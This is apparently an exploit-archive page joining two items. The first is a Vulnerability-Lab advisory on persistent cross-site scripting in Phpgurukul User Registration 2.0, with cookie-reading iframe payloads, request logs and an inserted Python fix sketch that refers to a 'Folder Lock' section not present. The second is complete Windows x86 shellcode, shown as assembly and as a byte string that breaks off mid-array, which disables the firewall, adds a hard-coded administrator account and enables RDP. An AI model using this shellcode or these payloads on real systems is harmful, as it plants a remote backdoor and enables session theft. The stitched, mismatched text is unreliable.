The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Phpgurukul User Registration 2.0 Cross Site Scripting


Phpgurukul User Registration version 2.0 suffers from persistent cross site scripting vulnerabilities.


MD5 | 57a63056f223b30399e631a82957717d

Document Title:
===============
Phpgurukul User Registration v2.0 - Multiple Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2216


Release Date:
=============
2020-04-20


Vulnerability Laboratory ID (VL-ID):
====================================
2216


Common Vulnerability Scoring System:
====================================
5.4


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
User Registration & Login and User Management System With Admin Panel v2.0.

(Copy of the Homepage:
https://phpgurukul.com/?smd_process_download=1&download_id=7003 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the Phpgurukul User Registration & User Management
System v2.0.


Affected Product(s):
====================
Anuj Kumar
Product: User Registration & Login and User Management System With Admin
Panel v2.0 (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-04-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been
discovered in the Phpgurukul User Registration & User Management System
v2.0. The vulnerabilities allow remote attackers to inject their own
malicious script code with a persistent attack vector to compromise
browser-to-web-application requests from the application side.

The persistent cross site scripting vulnerabilities are located in the
`firstname` and `lastname` parameters of the registration form and
login-system input fields. Remote attackers are able to register with
malicious script code as first name or last name to manipulate the
`manage-users.php` and `update-profile.php` files visible to
administrators in the backend. The injection point is the registration or
user edit module and the execution occurs on the manage-users preview or
on user edits. The request method to inject is POST and the attack vector
is located on the application side.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] firstname
[+] lastname

Vulnerable Module(s):
[+] Registration (Login-System)

Vulnerable Parameter(s):
[+] fname
[+] lname

Affected Module(s):
[+] Manage Users (manage-users.php)
[+] Update User (update-profile.php)


Proof of Concept (PoC):
=======================
The persistent input validation vulnerabilities can be exploited by
remote attackers without a privileged user account and with low user
interaction. For a security demonstration, or to reproduce the
vulnerability, follow the provided information and steps below.


Manual steps to reproduce ...
1. Open the registration form
2. Inject the payload into the firstname and lastname values
3. Submit the request via the POST method
4. Wait until the admin previews the users listing (no activation is needed)
Note: The execution occurs on user edit and in the user management listing
5. On preview the cookie is transmitted to the attacker, who can log in
with the non-expired cookie
6. Successful reproduction of the vulnerability!


--- PoC Session Logs (POST) --- (Inject)
https://localhost:8080/project/loginsystem/
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------84460134629716292423840703493
Content-Length: 897
Origin: https://localhost:8080
Connection: keep-alive
Referer: https://localhost:8080/project/loginsystem/
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4
fname=test1>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&lname=test2>"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>&email=keymaster31337@protonmail.com&password=whoami23&contact=31337317&signup=Sign
Up
-
POST: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2


PoC: Vulnerable Source (Execution Point - manage-users.php)
<tr>
<td>585</td>
<td>test1>"<iframe src="evil.source"
onload="alert(document.cookie)"></iframe></td>
<td>test2>"<iframe src="evil.source"
onload="alert(document.cookie)"></iframe></td>
<td>keymaster31337@protonmail.com</td>
<td>31337317</td><td>2020-04-19</td>
<td>
<a href="update-profile.php?uid=1223">
<button class="btn btn-primary btn-xs"><i class="fa
fa-pencil"></i></button></a>
<a href="manage-users.php?id=1223">
<button class="btn btn-danger btn-xs" onclick="return confirm('Do you
really want to delete');"><i class="fa fa-trash-o "></i></button></a>
</td>
</tr>


--- PoC Session Logs (GET) --- (Execution Admin Backend)
https://localhost:8080/project/loginsystem/admin/manage-users.php
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer:
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4; _gat_gtag_UA_106216538_1=1
-
GET: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2
-
https://localhost:8080/project/loginsystem/admin/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://localhost:8080/project/loginsystem/admin/manage-users.php
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4; _gat_gtag_UA_106216538_1=1
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-cache, must-revalidate, max-age=0
link: <https://localhost:8080/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2


PoC: Vulnerable Source (Execution Point - update-profile.php)
<section class="wrapper">
<h3><i class="fa fa-angle-right"></i> test1>"<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>'s Information</h3>
<div class="row">
<div class="col-md-12">
<div class="content-panel">
<p style="color:#F00;" align="center"></p>
<form class="form-horizontal style-form" name="form1" method="post"
action="" onsubmit="return valid();">
<p style="color:#F00"></p>
<div class="form-group">
<label class="col-sm-2 col-sm-2 control-label"
style="padding-left:40px;">First Name </label>
<div class="col-sm-10">
<input type="text" class="form-control" name="fname" value="test1>"
<iframe="evil.source" src="evil.source"
onload="alert(document.cookie)">">
</div>
</div>
<div class="form-group">
<label class="col-sm-2 col-sm-2 control-label"
style="padding-left:40px;">Last Ename</label>
<div class="col-sm-10">
<input type="text" class="form-control" name="lname" value="test2>"
<iframe="evil.source" src=evil.source" onload="alert(document.cookie)">"
>
</div>
</div>


--- PoC Session Logs [POST] ---
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
Origin: https://localhost:8080
Connection: keep-alive
Referer:
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4
fname=hello>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&lname=world>"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>&email=htp2020@protonmail.com&contact=2020-04-06,2020-03-06&Submit=Update
-
POST: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2
-
https://localhost:8080/project/loginsystem/admin/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer:
https://localhost:8080/project/loginsystem/admin/update-profile.php?uid=574
Cookie: _ga=GA1.2.399488116.1587293169; _gid=GA1.2.865518164.1587293169;
PHPSESSID=92276d293892927eea41e64e19c214a4
-
GET: HTTP/2.0 200 OK
server: Apache
x-powered-by: PHP/7.2.21
cache-control: no-cache, must-revalidate, max-age=0
link: <https://localhost:8080/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
vary: Accept-Encoding,User-Agent
content-type: text/html; charset=UTF-8
X-Firefox-Spdy: h2


Reference(s):
https://localhost:8080/project/
https://localhost:8080/project/loginsystem/
https://localhost:8080/project/loginsystem/admin/
https://localhost:8080/project/loginsystem/admin/manage-users.php
https://localhost:8080/project/loginsystem/admin/update-profile.php


Solution - Fix & Patch:
=======================
The vulnerability can be patched by following these steps ...
1. Parse and sanitize the fname and lname parameters in the registration
request
2. Restrict the input and registration process against special characters
and other malformed content
3. Sanitize the output in the update-profile.php and manage-users.php
file locations
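Added example, not code from Phpgurukul or Folder Lock: a Python sketch of the three fix steps above (allow-list validation of fname/lname at registration, then escaped output for the manage-users row and the update-profile value attribute), with the same output escaping applied to the Folder Lock breadcrumb and 404 message that are built from the `path` parameter described earlier on this page. Function names, the name allow-list and the HTML skeletons are assumptions of this example.

```python
"""Added example: not code from Phpgurukul or Folder Lock.

Sketches the fix steps above for the registration form and its two output
points, and applies the same output escaping to the Folder Lock breadcrumb
and 404 message that are built from the `path` parameter. Function names,
the name allow-list and the HTML skeletons are this example's own.
"""
import html
import re

# Step 1/2: allow-list for a person name (letters incl. Latin-1/Extended,
# space, apostrophe, dot, hyphen; 1-50 chars). Markup characters never pass.
NAME_RX = re.compile(r"^[A-Za-z\u00C0-\u024F][A-Za-z\u00C0-\u024F' .-]{0,49}$")


def validate_name(value: str) -> str:
    """Return the stripped name or raise ValueError; applied to fname and
    lname before the registration record is stored."""
    value = value.strip()
    if not NAME_RX.match(value):
        raise ValueError("name contains characters outside the allow-list")
    return value


def register(form: dict) -> dict:
    """Registration stand-in: the record that would reach the database
    (email/contact/password handling omitted)."""
    return {"fname": validate_name(form.get("fname", "")),
            "lname": validate_name(form.get("lname", ""))}


def esc(value) -> str:
    """Step 3: escape for HTML text and attribute context; quote=True is
    what stops a stored `"` from closing a value="..." attribute."""
    return html.escape(str(value), quote=True)


def render_user_row(user: dict) -> str:
    """manage-users.php-style listing row with every field escaped."""
    return ('<tr><td>{id}</td><td>{fn}</td><td>{ln}</td>'
            '<td><a href="update-profile.php?uid={id}">edit</a></td></tr>'
            ).format(id=esc(user["id"]), fn=esc(user["fname"]),
                     ln=esc(user["lname"]))


def render_profile_input(field: str, value: str) -> str:
    """update-profile.php-style input whose value attribute stays closed."""
    return (f'<input type="text" class="form-control" '
            f'name="{esc(field)}" value="{esc(value)}">')


def render_breadcrumb(path: str) -> str:
    """Folder Lock-style breadcrumb built from path segments, each escaped."""
    parts = [p for p in path.split("/") if p]
    items = ['<li data-path="/"><a>Device</a></li>']
    acc = "/"
    for p in parts[:-1]:
        acc += p + "/"
        items.append(f'<li data-path="{esc(acc)}"><a>{esc(p)}</a></li>')
    if parts:
        items.append(f'<li class="active">{esc(parts[-1])}</li>')
    return '<ol class="breadcrumb" id="path">' + "".join(items) + "</ol>"


def render_not_found(path: str) -> str:
    """list/download error page: the missing path is escaped, not echoed."""
    return f"<h1>HTTP Error 404: {esc(path)} does not exist</h1>"
```

Validation rejects the advisory's payloads outright, and the escaped renderers show that even a value that somehow reached storage would be displayed as text rather than parsed as an iframe.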


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the web application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental or consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:  www.vulnerability-lab.com  www.vuln-lab.com  www.vulnerability-db.com
Services: magazine.vulnerability-lab.com  paste.vulnerability-db.com  infosec.vulnerability-db.com
Social:   twitter.com/vuln_lab  facebook.com/VulnerabilityLab  youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php  vulnerability-lab.com/rss/rss_upcoming.php  vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php  vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™


--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


Microsoft Windows Firewall Disabling Shellcode


This 644-byte Microsoft Windows x86 shellcode disables the Windows firewall, adds the user MajinBuu with password TurnU2C@ndy!! to the system, adds that user to the local groups Administrators and Remote Desktop Users, and then enables the RDP service.


MD5 | a1d9a1235afb2e385b7e22e9cfe721eb

## Exploit Title: Windows/x86 - MSVCRT System - Dynamic Null-free - Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
## Exploit Author: Bobby Cooke
## Date: 2020-04-20
## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service.
## Commands used:
## 'netsh firewall set opmode mode=DISABLE'
## 'net user MajinBuu TurnU2C@ndy!! /add'
## 'net localgroup Administrators MajinBuu /add'
## 'net localgroup "Remote Desktop Users" MajinBuu /add'
## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

; Create stack frame
mov ebp, esp
sub esp, 0x30

; Find kernel32.dll base address
xor ebx, ebx
mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB
mov ebx, [ebx+0xC] ; EBX = Address_of_LDR
mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll
mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll

; Find the address of the Export Table within kernel32.dll
mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader
add ebx, eax ; EBX = &NewEXEHeader
mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
add ebx, eax ; EBX = &ExportTable

; Find the address of the Name Pointer Table within kernel32.dll
mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable
add edi, eax ; EDI = &NamePointerTable
mov [ebp-0x8], edi ; save &NamePointerTable to stack frame

; Find the address of the Ordinal Table
mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable
add ecx, eax ; ECX = &OrdinalTable
mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame

; Find the address of the Address Table
mov edx, [ebx+0x1C] ; EDX = RVA AddressTable
add edx, eax ; EDX = &AddressTable
mov [ebp-0x10], edx ; save &AddressTable to stack-frame

; Find Number of Functions within the Export Table of kernel32.dll
mov edx, [ebx+0x14] ; EDX = Number of Functions
mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame

jmp short functions

findFunctionAddr:
; Initialize the Counter to prevent infinite loop
xor eax, eax ; EAX = Counter = 0
mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame
; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
searchLoop:
mov edi, [ebp-0x8] ; EDI = &NamePointerTable
mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for
xor ecx, ecx ; ECX = 0x00000000
cld ; clear direction flag - Process strings from left to right
mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll
add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
repe cmpsb ; compare the first 15 bytes of [&NameString] to "GetProcAddress",0x00
jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
inc eax ; else Counter ++
cmp eax, edx ; Does EAX == Number of Functions?
jb searchLoop ; If EAX != Number of Functions, then restart the loop

found:
; Find the address of GetProcAddress by using the last value of the Counter
mov ecx, [ebp-0xC] ; ECX = &OrdinalTable
mov edx, [ebp-0x10] ; EDX = &AddressTable
mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber]
add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll
ret

functions:
; Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp)
call findFunctionAddr ; After Return EAX will = &GetProcAddress
; EAX = &GetProcAddress
mov [ebp-0x1C], eax ; save &GetProcAddress

; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
xor edx, edx ; EDX = 0x00000000
push edx ; null terminator for LoadLibraryA string
push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
push 0x7262694c ; rbiL : 7262694c
push 0x64616f4c ; daoL : 64616f4c
push esp ; lpProcName -- push the address of the "LoadLibraryA" string onto the stack
push dword [ebp-0x4] ; hModule -- push the base address of kernel32.dll onto the stack
mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
mov [ebp-0x20], eax ; save Address of LoadLibraryA

; Call LoadLibraryA(PTR "msvcrt")
; push "msvcrt",0x00 to the stack and save pointer
xor eax, eax ; clear eax
mov ax, 0x7472 ; tr : 7472
push eax
push 0x6376736D ; cvsm : 6376736D
push esp ; push the pointer to the string
mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register
call ebx ; call the LoadLibraryA Function to load msvcrt.dll
mov [ebp-0x24], eax ; save Address of msvcrt.dll

; Call GetProcAddress(msvcrt.dll, "system")
xor edx, edx
mov dx, 0x6d65 ; me : 6d65
push edx
push 0x74737973 ; tsys : 74737973
push esp ; push pointer to string to stack for 'system'
push dword [ebp-0x24] ; push base address of msvcrt.dll to stack
mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress
; EAX = &msvcrt.system
mov [ebp-0x28], eax ; save Address of msvcrt.system

; 'netsh firewall set opmode mode=DISABLE'
xor ecx, ecx
mov cx, 0x454c ; EL : 454c
push ecx
push 0x42415349 ; BASI : 42415349
push 0x443d6564 ; D=ed : 443d6564
push 0x6f6d2065 ; om e : 6f6d2065
push 0x646f6d70 ; domp : 646f6d70
push 0x6f207465 ; o te : 6f207465
push 0x73206c6c ; s ll : 73206c6c
push 0x61776572 ; awer : 61776572
push 0x69662068 ; if h : 69662068
push 0x7374656e ; sten : 7374656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system

; 'net user MajinBuu TurnU2C@ndy!! /add'
xor ecx, ecx
push ecx
push 0x6464612f ; dda/ : 6464612f
push 0x20212179 ; !!y : 20212179
push 0x646e4043 ; dn@C : 646e4043
push 0x32556e72 ; 2Unr : 32556e72
push 0x75542075 ; uT u : 75542075
push 0x75426e69 ; uBni : 75426e69
push 0x6a614d20 ; jaM : 6a614d20
push 0x72657375 ; resu : 72657375
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system

; 'net localgroup Administrators MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575 ; / uu : 2f207575
push 0x426e696a ; Bnij : 426e696a
push 0x614d2073 ; aM s : 614d2073
push 0x726f7461 ; rota : 726f7461
push 0x72747369 ; rtsi : 72747369
push 0x6e696d64 ; nimd : 6e696d64
push 0x41207075 ; A pu : 41207075
push 0x6f72676c ; orgl : 6f72676c
push 0x61636f6c ; acol : 61636f6c
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system

; 'net localgroup "Remote Desktop Users" MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575 ; / uu : 2f207575
push 0x426e696a ; Bnij : 426e696a
push 0x614d2022 ; aM " : 614d2022
push 0x73726573 ; sres : 73726573
push 0x5520706f ; U po : 5520706f
push 0x746b7365 ; tkse : 746b7365
push 0x44206574 ; D et : 44206574
push 0x6f6d6552 ; omeR : 6f6d6552
push 0x22207075 ; " pu : 22207075
push 0x6f72676c ; orgl : 6f72676c
push 0x61636f6c ; acol : 61636f6c
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system

; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
xor ecx, ecx
push ecx
push 0x662f2030 ; f/ 0 : 662f2030
push 0x20642f20 ; d/ : 20642f20
push 0x44524f57 ; DROW : 44524f57
push 0x445f4745 ; D_GE : 445f4745
push 0x5220742f ; R t/ : 5220742f
push 0x20736e6f ; sno : 20736e6f
push 0x69746365 ; itce : 69746365
push 0x6e6e6f43 ; nnoC : 6e6e6f43
push 0x5354796e ; STyn : 5354796e
push 0x65446620 ; eDf : 65446620
push 0x762f2022 ; v/ " : 762f2022
push 0x72657672 ; revr : 72657672
push 0x6553206c ; eS l : 6553206c
push 0x616e696d ; anim : 616e696d
push 0x7265545c ; reT\ : 7265545c
push 0x6c6f7274 ; lort : 6c6f7274
push 0x6e6f435c ; noC\ : 6e6f435c
push 0x7465536c ; teSl : 7465536c
push 0x6f72746e ; ortn : 6f72746e
push 0x6f43746e ; oCtn : 6f43746e
push 0x65727275 ; erru : 65727275
push 0x435c4d45 ; C\ME : 435c4d45
push 0x54535953 ; TSYS : 54535953
push 0x5c454e49 ; \ENI : 5c454e49
push 0x4843414d ; HCAM : 4843414d
push 0x5f4c4143 ; _LAC : 5f4c4143
push 0x4f4c5f59 ; OL_Y : 4f4c5f59
push 0x454b4822 ; EKH" : 454b4822
push 0x20646461 ; dda : 20646461
push 0x20676572 ; ger : 20676572
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system


######################################################################################
#include <windows.h>
#include <stdio.h>

char code[] = \
"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
